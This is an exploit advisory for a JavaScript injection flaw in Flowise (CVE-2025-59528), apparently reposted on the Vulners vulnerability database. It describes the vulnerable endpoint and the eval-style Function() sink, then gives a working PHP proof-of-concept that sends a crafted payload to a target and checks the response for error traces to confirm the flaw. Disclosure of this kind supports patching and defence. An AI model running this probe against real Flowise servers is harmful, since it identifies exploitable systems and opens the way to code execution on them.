Vulners
Lucene search
📄 Flowise 3.0.6 JS Parsing Injection
10
=============================================================================================================================================
| # Title : Flowise 3.0.6 JS Parsing Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://flowiseai.com/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/211933/ & CVE-2025-59528
[+] Summary :
A JavaScript Parsing Injection vulnerability exists in the following Flowise versions:
Affected: >= 2.2.7-patch.1 and < 3.0.6
Unauthenticated exploitation possible for versions < 3.0.1
Authentication required for versions >= 3.0.1
The vulnerability resides in the endpoint : /api/v1/node-load-method/customMCP
Flowise internally evaluates user input using: Function('return ' + inputString)()
This unsafe parsing mechanism allows a remote attacker to inject malformed JavaScript payloads, causing unexpected parsing behavior, syntax exceptions, stack traces, and other abnormal internal execution paths.
This report does NOT demonstrate RCE and does NOT execute system commands.
It focuses strictly on parsing injection as requested.
2. Vulnerability Description
The parameter: inputs.mcpServerConfig
is passed directly to a JavaScript interpreter via: Function("return " + input)
Because Flowise does not sanitize or validate the input, an attacker can supply a malformed or intentionally broken JavaScript object to force Flowise to:
Attempt to interpret the injected JavaScript
Generate SyntaxError, ReferenceError, or Unexpected token exceptions
Leak internal execution traces
Confirm the backend is evaluating untrusted JS strings
This behavior proves the system is vulnerable to JavaScript parsing injection.
3. Impact
Although this report intentionally excludes RCE, the underlying unsafe parsing mechanism could be chained with additional primitives depending on deployment context.
The confirmed impact here is:
JavaScript parsing injection
Potential denial of service via crafted parsing payloads
Internal error leakage
Strong indicator of further exploitable unsafe evaluation paths
This advisory documents only the safe, non-executing variant.
poc
<?php
/**
* Flowise JS Parsing Injection PoC by indoushka
* -------------------------------------------------
* Demonstrates unsafe JavaScript evaluation through controlled parsing failure.
*/
$target = "http://victim-flowise:3000/api/v1/node-load-method/customMCP";
// Malformed JS that forces the backend parser to reveal unsafe Function() behavior
$payload = '{x:(function(){ invalid_code_here++ })()}';
$data = [
"loadMethod" => "listActions",
"inputs" => [
"mcpServerConfig" => $payload
]
];
$options = [
"http" => [
"header" => "Content-Type: application/json\r\n",
"method" => "POST",
"content" => json_encode($data),
"timeout" => 6
]
];
echo "[*] Sending Parsing Injection Payload...\n";
$context = stream_context_create($options);
$response = @file_get_contents($target, false, $context);
echo "-----------------------------------\n";
if (!$response) {
echo "[!] Target did not respond.\n";
exit;
}
// Detection patterns
if (preg_match('/SyntaxError|ReferenceError|Unexpected|stack/i', $response)) {
echo "[+] Vulnerable: JS Parsing Injection confirmed.\n";
echo "[+] Evidence: Backend attempted to interpret injected JS.\n";
} else {
echo "[-] Not vulnerable or patched.\n";
}
echo "-----------------------------------\n";
echo "[*] Raw Response:\n$response\n";
Save as : poc.php
run : php poc.php
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Dec 2025 00:00Current
7High risk
Vulners AI Score7
CVSS 3.110
EPSS0.86202
SSVC